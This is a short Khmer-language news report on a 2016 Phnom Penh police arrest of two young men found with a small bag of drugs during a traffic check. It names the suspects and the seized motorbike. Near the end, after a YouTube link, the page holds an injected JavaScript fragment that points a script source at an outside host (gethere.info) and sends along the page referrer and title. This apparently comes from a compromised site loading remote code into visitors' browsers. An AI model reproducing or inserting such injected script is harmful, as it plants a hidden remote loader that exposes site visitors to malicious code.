ឃាត់ខ្លួនជនសង្ស័យ២នាក់​ ជាមួយថ្នាំញៀន០១កញ្ចប់ និងម៉ូតូ១គ្រឿងខណៈចុះពង្រឹងច្បាប់ចរាចរណ៍

ភ្នំពេញ៖ជនសង្ស័យ២ត្រូវបានឃាត់ខ្លួនដោយកម្លាំងនៃអធិការដ្ឋាននគរបាលខណ្ឌទួលគោក រួមជាមួយថ្នាំញៀន និងម៉ូតូ ០១ គ្រឿង ខណៈចុះត្រួតពង្រឹងច្បាប់ចរាចរណ៍ រួចបញ្ជូនទៅអធិការដ្ឋានខណ្ឌ ក្រោយពីឆែកឆេររកឃើញថ្នាំញៀនមួយកញ្ចប់ កាលពីវេលាម៉ោង៩និង២០នាទីយប់ថ្ងៃទី១៦ ខែសីហាឆ្នាំ២០១៦នេះ នៅចំណុចផ្លូវលេខ១៨២ ក្រុមទី២១ ភូមិ៨ សង្កាត់ទឹកល្អក់ទី ៣ ខណ្ឌទួលគោក រាជធានីភ្នំពេញ ។

 

ជនសង្ស័យ ទី១-ឈ្មោះ ធី យោទី ហៅ ទី ភេទប្រុស អាយុ ២២ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ ពុំពិតប្រាកដ ស្នាក់នៅភូមិកោះកែវ ឃុំកោះកែវ ស្រុកល្វាឯម ខេត្តកណ្តាល ។ ២-ឈ្មោះ យី ធី ហៅ ឆិ ភេទប្រុស អាយុ ២២ឆ្នាំ ជន ជាតិខ្មែរ មុខរបរ ពុំពិតប្រាកដ ស្នាក់នៅភូមិកោះកែវ ឃុំ កោះកែវ ស្រុកល្វាឯម ខេត្តកណ្តាល ។

 

ក្នុ្ងងការឃាត់ខ្លួនសមត្ថកិច្ចបានដកហូតវត្ថុតាង មានថ្នាំញៀនប្រភេទក្រាមពណ៌សថ្លា ចំនួន ០១ កញ្ចប់ថង់តូច  -ម៉ូតូមួយគ្រឿងម៉ាក Suzuki Nex ពណ៌ស ស៊េរី 2015 ពាក់ស្លាកលេខភ្នំពេញ 1FU-4502។

បច្ចុប្បន្នជនសង្ស័យខាងលើកំពុងបានឃុំខ្លួនជាបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌទួលគោក ដើម្បីកសាងសំណុំរឿងបញ្ជូនខ្លួនទៅតុលាការចាត់ការតាមនិតិវិធីច្បាប់ ៕ដោយ៖ ខេង ប៊ុនធឿន

https://youtu.be/FMmHkdsOvLUs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More